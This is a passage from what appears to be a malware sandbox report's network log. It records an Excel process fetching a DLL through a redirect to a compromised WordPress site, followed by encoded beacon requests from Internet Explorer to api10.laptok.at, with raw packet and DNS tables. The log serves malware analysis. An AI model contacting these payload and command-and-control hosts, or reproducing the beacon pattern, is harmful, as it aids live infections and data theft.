                                                                                                                                                  Feb 9, 2021 18:41:50.366967916 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.366970062 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366997004 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.367013931 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.367016077 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.367032051 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.367048979 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.367069960 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.367259979 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527359009 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527385950 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527401924 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527419090 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527434111 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527450085 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527466059 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527483940 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527502060 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527517080 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527533054 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527549028 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527564049 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527580023 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527579069 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527595043 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527615070 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527631998 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527647018 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527669907 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527707100 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527723074 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527734995 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527761936 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527779102 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527795076 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527800083 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527829885 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527853012 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.527867079 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527903080 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.527909994 CET49728443192.168.2.6192.185.16.102

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 9, 2021 18:41:28.503180027 CET5602353192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:28.554065943 CET53560238.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:29.436470032 CET5838453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:29.487951040 CET53583848.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:30.384464979 CET6026153192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:30.444377899 CET53602618.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:31.674437046 CET5606153192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:31.725266933 CET53560618.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:33.007389069 CET5833653192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:33.058994055 CET53583368.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:36.943169117 CET5378153192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:36.991944075 CET53537818.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:39.044589996 CET5406453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:39.093472004 CET53540648.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:40.322514057 CET5281153192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:40.392273903 CET53528118.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:40.402009964 CET5529953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:40.453510046 CET53552998.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:40.869976044 CET6374553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:40.928534031 CET53637458.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:41.876198053 CET6374553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:41.941788912 CET53637458.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:42.891485929 CET6374553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:42.947746038 CET5005553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:43.001004934 CET53500558.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:43.034580946 CET53637458.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:44.907017946 CET6374553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:44.963862896 CET53637458.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:48.799129009 CET6137453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:48.922972918 CET6374553192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:48.980077982 CET53637458.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:48.997062922 CET53613748.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:57.623142004 CET5033953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:41:57.679775953 CET53503398.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:04.881876945 CET6330753192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:04.930968046 CET53633078.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:06.345839977 CET4969453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:06.397499084 CET53496948.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:11.857353926 CET5498253192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:11.915786982 CET53549828.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:17.922410011 CET5001053192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:17.982613087 CET53500108.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:18.745208979 CET6371853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:18.793952942 CET53637188.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:26.550574064 CET6211653192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:26.609859943 CET53621168.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:36.924678087 CET6381653192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:36.991856098 CET53638168.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:37.584804058 CET5501453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:37.648559093 CET53550148.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:38.275429010 CET6220853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:38.336774111 CET53622088.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:38.821417093 CET5757453192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:38.881702900 CET53575748.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:39.590432882 CET5181853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:39.641513109 CET53518188.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:39.780750036 CET5662853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:39.856774092 CET53566288.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:40.199032068 CET6077853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:40.260950089 CET53607788.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:40.870405912 CET5379953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:40.927604914 CET53537998.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:41.654792070 CET5468353192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:41.714569092 CET53546838.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:42.520677090 CET5932953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:42.578167915 CET53593298.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:43.036566973 CET6402153192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:43.085257053 CET53640218.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:42:59.064851046 CET5612953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:42:59.113509893 CET53561298.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:43:02.161782980 CET5817753192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:43:02.213485956 CET53581778.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:43:03.909801960 CET5070053192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:43:03.970237970 CET53507008.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:43:19.830799103 CET5406953192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:43:19.884351969 CET53540698.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:43:58.118815899 CET6117853192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:43:58.177479029 CET53611788.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:43:59.474664927 CET5701753192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:43:59.782507896 CET53570178.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:44:01.800584078 CET5632753192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:44:02.176213980 CET53563278.8.8.8192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:44:04.188833952 CET5024353192.168.2.68.8.8.8
                                                                                                                                                  Feb 9, 2021 18:44:04.250488043 CET53502438.8.8.8192.168.2.6

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Feb 9, 2021 18:41:48.799129009 CET192.168.2.68.8.8.80x2d88Standard query (0)urbandancecity.comA (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:43:59.474664927 CET192.168.2.68.8.8.80xf710Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:44:01.800584078 CET192.168.2.68.8.8.80x46a2Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:44:04.188833952 CET192.168.2.68.8.8.80xa66dStandard query (0)api10.laptok.atA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Feb 9, 2021 18:41:48.997062922 CET8.8.8.8192.168.2.60x2d88No error (0)urbandancecity.com192.185.16.102A (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:43:59.782507896 CET8.8.8.8192.168.2.60xf710No error (0)api10.laptok.at35.228.31.40A (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:44:02.176213980 CET8.8.8.8192.168.2.60x46a2No error (0)api10.laptok.at35.228.31.40A (IP address)IN (0x0001)
                                                                                                                                                  Feb 9, 2021 18:44:04.250488043 CET8.8.8.8192.168.2.60xa66dNo error (0)api10.laptok.at35.228.31.40A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 139.162.190.91
                                                                                                                                                  • api10.laptok.at

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.649727139.162.190.9180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:41:48.621252060 CET145OUTGET /campo/a/a HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 139.162.190.91
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:41:48.785017967 CET145INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:41:48 GMT
                                                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                  Set-Cookie: ci_session=cgq0t24pplll8tat5jqrf51c4b83ka4g; expires=Tue, 09-Feb-2021 19:41:48 GMT; Max-Age=7200; path=/; HttpOnly
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Location: https://urbandancecity.com/wp-content/cache/stats/5fe/5bc/2200.dll
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.64975535.228.31.4080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:43:59.877289057 CET5422OUTGET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1
                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Host: api10.laptok.at
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:44:00.279098034 CET5423INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:44:00 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 35 92 e4 00 10 04 1f 24 43 4c a6 18 47 cc 9e 98 99 f5 fa db 73 27 36 46 31 ea ee aa 4c 63 4d 67 3a f4 21 1e 6d c3 9e bb fb 5b 4a 92 c2 7f 89 cb bb a7 60 4b 27 c2 42 e5 50 d2 1b 73 10 9a 1b de 8d 61 7e 09 26 10 d1 f5 60 7c ce f3 e9 0f f4 bc fc dc 59 7e 45 72 48 3a da a3 20 70 38 71 bd 97 2e b5 a9 80 d4 8f 49 55 68 51 82 37 10 a0 5e da d7 41 4e d4 75 0d 45 0e 82 d4 01 24 c3 b2 9b 05 4e d7 2d eb 27 55 cb 44 1f bb de ad 3f ba 47 ff 3e 5b 9c 11 e7 bc 23 06 b4 fd 93 9e ad f5 ca a7 e2 a1 62 75 76 60 14 98 fd 30 4c 5f 6b bf 36 14 f7 94 c0 e8 8a 65 2d 7f 8e 07 61 ca 34 82 52 be ce b0 c0 8f 57 a1 55 7c a3 fc d3 d0 82 bb 0f 24 9e d5 19 59 22 1c 5f 0f 26 94 d3 07 02 19 16 7d 23 ae 43 7f 66 0c 74 97 8a fa 37 4e 09 a6 8a 67 ae 94 e3 a4 87 44 22 c2 a8 dd 8f 4e 9c c3 3a 37 0d 49 fd 64 84 a6 f3 27 95 c3 2f 05 6c f4 0e 38 63 63 ad f3 4c 7b 07 93 f6 0d 17 f6 45 b3 21 7e b2 58 4a 83 6a c2 91 4e e5 f9 50 54 0e d4 02 bf a3 df 81 de 72 36 62 f2 84 f2 98 31 8d 9f d3 d0 43 19 c1 ad 27 c0 24 7b 3e 4b 4f ce ee e4 33 52 f6 35 7d f9 f5 af 73 5f 02 67 2e 83 27 cd ac 3a 8b 40 cd fb 8a 1c 51 ea 86 a6 e7 3a 99 0a d3 7b 09 a0 b1 6a 7c c4 27 76 a4 9e 9b e8 46 0d ab b2 12 d6 77 6e dd b2 b6 50 a4 3d e7 d9 e7 3d 10 d1 be 17 ab b3 9e d9 a2 27 c6 77 0b 79 41 95 04 41 10 8b e3 77 49 5d 4b 14 45 a5 e9 5e ab bb b3 90 86 82 5d 7b fd 2d c6 e7 e2 a1 43 79 e8 a6 6f c1 82 27 07 fa 6a d6 86 c9 d9 4f b5 ac 15 29 cc aa a4 18 80 12 c9 ee 25 0d d1 bc c1 9b 1e 49 3d f5 7b 3d db 18 49 65 64 70 58 6e 63 1f 3a 5b 78 e6 36 2e 92 93 92 47 c1 a9 c6 e7 31 59 39 fa c1 7c df e3 0c 9c 56 6a 59 2b ca 43 5f 77 5e 37 1a f0 80 5e e6 ba be 28 dd 1c 84 bc 4a 1e ac ca 82 1d 6f 93 27 6b c0 e4 34 99 0f 95 9c 07 2a f9 73 83 44 59 de c6 dd 85 32 0e b0 f6 81 9c 97 9f cb 67 34 40 57 3c 92 e4 ee 1f 3a 28 f2 cd cf a5 ec a4 99 5f 27 ce 6a 17 7d b8 3f 53 cc 11 6b 10 32 a7 06 d2 03 3f 71 d4 89 26 66 15 71 c0 e1 14 64 21 b9 4d 8e 61 3a ed 7a cc 48 d9 57 26 94 e4 90 97 47 8b f9 6c 91 0b 60 bf 15 50 e8 f0 ed 60 a0 ed d7 70 b6 05 f4 f5 1a 4c 63 b4 a3 a4 c9 4a d7 dc d7 b0 10 e5 e2 c0 b2 5f 40 b0 84 e0 86 d9 11 79 fe db 4d 62 11 d3 66 17 9c 48 4f 40 91 c9 e6 6d 2b ad ac d3 8b a4 62 f1 89 e3 93 4c b3 ea 2f 72 32 c5 5a 7b a9 0f 96 70 eb 58 bb 60 a6 fc 17 8b d0 4c 2e 31 6a bd 55 74 89 b8 f9 a0 32 f3 1d 12 9c 57 7e a1 f7 19 84 f0 2a cd f5 0e ee e7 69 3d 94 ca 0d bb cb da 9c e4 8e 46 cc 8b 6a 1b 0d 1a b9 bf 5a 6b 29 79 3f 03 af 30 70 54 8d fb 0c 36 55 7a 94 62 15 6b 61 7a 9a 88 e8 63 5c a1 1a ba ce 54 1e 4d 77 84 d7 b2 87 b9 cd 38 11 65 da 3a 80 5f 0f ff 32 95 f8 a8 9d 8f 45 cf 2b 99 f9 f3 af bd 4a 2c c3 dd 58 e0 35 39 7f d6 95 9b a0 a5 c1 f4 cc 19 02 7e 73 52 63 d7 23 f9 f8 8e 50 af 0f c5 34 11 ac 3b 43 46 6f ae ad 2c 9a 36 19 89 6e 03 d7 bd fa d9 d9 ae 5a 52 12 e1 6b 7b 57 f0 8d aa 3e 01 fa c9 5e 06 2c fb a9 48 ca 7c 27 7a 8a 0c 5e bb 2a 26 f7 c8 e7 ce f7 63 42 71 50 b4 20 98 bc ed fb a4 e4 99 29 88 7a dc 71 0c b3 92 79 c8 f3 77 e8 ff a6 bb b0 4a 76 11 f2 8f 32 ef 42 a2 3a 71 f3 ef 48 12 70 c4 37 b1 9f ea 77 f8 48 6f 8a bb 05 28 d6 a4 87 b9 42 60 b2 fe 08 c0 62 9c c0 e1 15 e0 ad 5a 54 55
                                                                                                                                                  Data Ascii: 20005$CLGs'6F1LcMg:!m[J`K'BPsa~&`|Y~ErH: p8q.IUhQ7^ANuE$N-'UD?G>[#buv`0L_k6e-a4RWU|$Y"_&}#Cft7NgD"N:7Id'/l8ccL{E!~XJjNPTr6b1C'${>KO3R5}s_g.':@Q:{j|'vFwnP=='wyAAwI]KE^]{-Cyo'jO)%I={=IedpXnc:[x6.G1Y9|VjY+C_w^7^(Jo'k4*sDY2g4@W<:(_'j}?Sk2?q&fqd!Ma:zHW&Gl`P`pLcJ_@yMbfHO@m+bL/r2Z{pX`L.1jUt2W~*i=FjZk)y?0pT6Uzbkazc\TMw8e:_2E+J,X59~sRc#P4;CFo,6nZRk{W>^,H|'z^*&cBqP )zqywJv2B:qHp7wHo(B`bZTU


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.64975635.228.31.4080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:44:00.765930891 CET5634OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: api10.laptok.at
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:44:00.867918015 CET5634INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:44:00 GMT
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.64975735.228.31.4080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 9, 2021 18:44:02.256082058 CET5635OUTGET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1
                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Host: api10.laptok.at
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 9, 2021 18:44:02.714838982 CET5637INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 09 Feb 2021 17:44:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a b5 82 ab 50 14 45 3f 88 02 b7 12 77 77 3a 2c b8 4b 80 af 7f 99 d7 4e 91 84 7b cf d9 7b ad 4c 78 aa b8 96 b1 c2 7a 8d 94 53 ca ab 0c 78 c0 97 0c 8c 1c 1b 61 97 1b 0f 41 dd 42 42 bf c9 b9 2f 61 9c 79 c1 4e a5 50 f4 9f 91 34 5d e9 e2 ba f5 74 88 02 d3 d7 0a 2b 86 1a a5 94 ee 3e a9 70 d4 87 92 18 d4 2f c9 8b e6 c2 3a 4a 94 a8 96 4f b7 b9 c7 ba 75 5b b8 12 ac 6b 2a 8b 25 7d a0 97 94 a1 7b b4 7e 26 75 04 ca af 69 51 11 16 38 2b 93 d8 d6 67 67 68 47 23 fd 38 88 52 81 97 6b f7 72 5a d2 3c c9 ad ca c1 68 80 25 80 1d 94 77 a5 e1 43 42 d1 c2 a0 9e 86 8f 70 73 33 43 34 52 92 0a 36 51 e6 40 a8 27 c3 ac 2f bd 59 db cd a2 70 ab 4d 05 23 89 d4 b1 42 42 14 07 66 fe a9 93 0e d2 4f e2 b3 5f ef a9 08 94 e0 09 5e 97 0c 5b f1 a6 a8 eb 89 ee 40 06 dd e2 23 4f e2 65 51 7a 78 8c 75 de de 8e d5 1d 4b 25 1e 5d dc 74 bc 52 32 07 41 91 b2 43 cb f2 d5 3b 9a 61 9f af 94 6a fa dc 2f 5a 23 6d 00 19 2a 37 84 7e 99 35 d0 5f ea 8a ac f6 e9 e3 eb 53 ea cd d7 54 78 a2 0b 8b 71 16 b1 5c d7 79 c1 e3 13 07 a9 ae f3 2d e4 44 2e 01 62 14 36 c7 6e f7 10 b5 07 6e fb 32 e8 6d 63 3a df 4b 05 60 75 52 cd cf c2 1d 7c d0 8a 0d db c8 94 60 b1 20 76 08 9c 92 56 df 37 32 08 f7 d6 42 c9 79 ed cc ba 13 df 54 38 89 bc 43 62 04 b5 a3 39 60 8d bd 33 b5 47 eb 5a 12 0d 3e 7b 6a c1 2d 54 d8 f6 c6 34 88 e7 e1 29 6b 51 19 c6 15 f3 bd a2 47 a6 37 1c fd 7e d5 59 8f 5a 43 09 13 be 8d c3 c4 4a 0c 72 d3 55 51 28 8c 94 a1 b3 cf e6 ba e1 ce 0c 45 ec 53 73 87 4e b3 39 b2 2a 9c 1a 0d 4f dc 90 8a 34 d0 cb 13 6d 75 62 28 4c 02 6c 